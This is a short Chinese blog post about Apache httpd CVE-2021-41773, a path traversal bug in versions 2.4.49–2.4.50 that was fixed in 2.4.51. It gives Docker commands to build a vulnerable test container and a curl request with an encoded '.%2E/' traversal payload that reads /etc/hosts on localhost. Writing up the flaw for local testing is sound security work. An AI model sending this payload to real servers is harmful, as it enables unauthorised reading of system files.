就是 > CVE-2021-41773

Apache 也在 10/7 號更新了版本 CHANGES_2.4.51

↑ 它說影響範圍是 2.4.49 與 2.4.50 版本,(舊版本是沒有的)

可以 POC 測試 >> /CVE-2021-41773

用 docker 測試

git clone https://github.com/masahiro331/CVE-2021-41773.git
cd CVE-2021-41773
docker build -t cve-2021-41773 .
docker run -d -p 8080:80 cve-2021-41773
curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
Related posts 相關文章
apache httpd 2.4.58 有些安全性更新
More...
CentOS7 透過 systemd 自動讓服務 restart 重啟
More...
用 GoAccess 即時分析 IIS Access Log
More...
用 GoAccess 即時分析 Apache Access Log
More...

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。